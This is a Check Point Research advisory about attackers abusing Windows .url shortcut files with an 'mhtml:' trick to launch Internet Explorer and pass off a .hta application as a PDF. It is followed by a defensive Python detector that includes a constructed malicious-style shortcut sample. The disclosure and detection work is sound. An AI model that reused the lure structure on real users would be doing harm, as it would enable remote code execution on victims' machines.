Check Point Research (CPR) warns of a new spoofing attack in which threat actors use Internet Explorer shortcut files to lure Windows 10/11 users into remote code execution. CPR recommends Microsoft customers patch immediately.

Key Findings

  • Threat actors are luring Windows 10/11 users into enabling remote code execution and accessing their computers
  • This vulnerability has been used in the wild for over one year, potentially impacting millions of users
  • CPR disclosed the vulnerability to Microsoft in May 2024; Microsoft published patches on 9 July 2024
  • CPR recommends users regularly patch and update all software to ensure greatest protection against cyber threats
  • Check Point released protections on IPS and Harmony Email months ahead of this publication to protect customers against this zero-day attack; the IPS signature is named “Internet Shortcut File Remote Code Execution”.
  • Harmony Email and Collaboration provides comprehensive inline protection against this zero-day attack at the highest security level.

Overview

Check Point Research recently discovered that threat actors have been using novel (or previously unknown) tricks to lure Windows users into enabling remote code execution.

Specifically, the attackers used special Windows Internet Shortcut files (.url extension), which, when clicked, would call the retired Internet Explorer (IE) to visit the attacker-controlled URL. An additional trick on IE was used to hide the malicious “.hta” extension. By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim’s computer, even though the computer is running the modern Windows 10/11 operating system.

Note that it is not uncommon for threat actors to use .url files as an initial attack vector in their campaigns. Even novel or zero-day url-file-related vulnerabilities have been used before; CVE-2023-36025, which was patched last November, is a good example.

The malicious .url samples discovered by CPR date from as early as January 2023 through May 13, 2024 and beyond. This suggests that threat actors have been using these attack techniques for quite some time.

For the full analysis of this attack, visit the CPR blog.

Defense and Mitigation 

These exploitation tricks, which have been actively used in the wild for at least one year, work on the latest Windows 10/11 operating systems.

Check Point released protections on IPS and Harmony Email months ago to ensure customers remain protected; the IPS signature is named “Internet Shortcut File Remote Code Execution.” Windows users should immediately install the Microsoft patch.

Additionally, Harmony Email and Collaboration provides comprehensive inline protection against this zero-day attack at the highest security level.

Conclusion 

CPR recommends Windows users remain vigilant about .url files sent from untrusted sources. This tricky attack enables attackers to leverage IE (instead of the more secure Chrome/Edge browsers). It works in two ways:

  • The “mhtml” trick, which allows the attacker to call (or resurrect) the IE browser
  • A second trick that leads the user into opening what they think is a PDF but is actually a dangerous .hta application
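As an added illustration for defenders (this is not code from CPR or the original post), the following Python checks a .url file for the two signals this article describes: a URL handed to the “mhtml:” handler, and a target that ends in .hta even when a PDF-looking name precedes it. The two sample files are constructed; the real samples’ extension-hiding trick is described only in the full CPR blog, and the percent-encoded “.hta” here is just a stand-in for it.

```python
import re
from urllib.parse import unquote

# Constructed sample .url files (not samples from the CPR report).
SAMPLES = {
    # Mimics the shape described above: mhtml: hands the URL to IE, and the
    # target looks like a PDF but actually ends in .hta (percent-encoded here).
    "invoice.pdf.url": (
        "[InternetShortcut]\r\n"
        "URL=mhtml:http://example.invalid/docs/invoice.pdf%2Ehta\r\n"
        "ShowCommand=7\r\n"
        "IconIndex=13\r\n"
    ),
    # Benign shortcut for comparison.
    "homepage.url": (
        "[InternetShortcut]\r\n"
        "URL=https://www.example.com/\r\n"
    ),
}

def parse_url_file(text: str) -> dict:
    """Return key/value pairs of the [InternetShortcut] section, keys lowercased."""
    fields, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields

def assess_url_file(text: str) -> list:
    """Return the indicators found; an empty list means nothing suspicious."""
    findings = []
    url = parse_url_file(text).get("url", "")
    decoded = unquote(url).lower()  # a percent-encoded ".hta" is still ".hta"
    if decoded.startswith("mhtml:"):
        findings.append("mhtml: scheme (URL is handed to Internet Explorer)")
    if re.search(r"\.hta(?:$|[?#/\\])", decoded):
        findings.append(".hta target (HTML Application, executes as code)")
    return findings

def scan_samples(samples: dict) -> dict:
    """Map each file name to its findings; useful for a mailbox or share sweep."""
    return {name: assess_url_file(body) for name, body in samples.items()}
```

Run `scan_samples(SAMPLES)` to see the constructed malicious shortcut flagged on both counts and the benign one returned with no findings.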

Check Point Research continues to monitor the activities related to this type of attack around the globe.
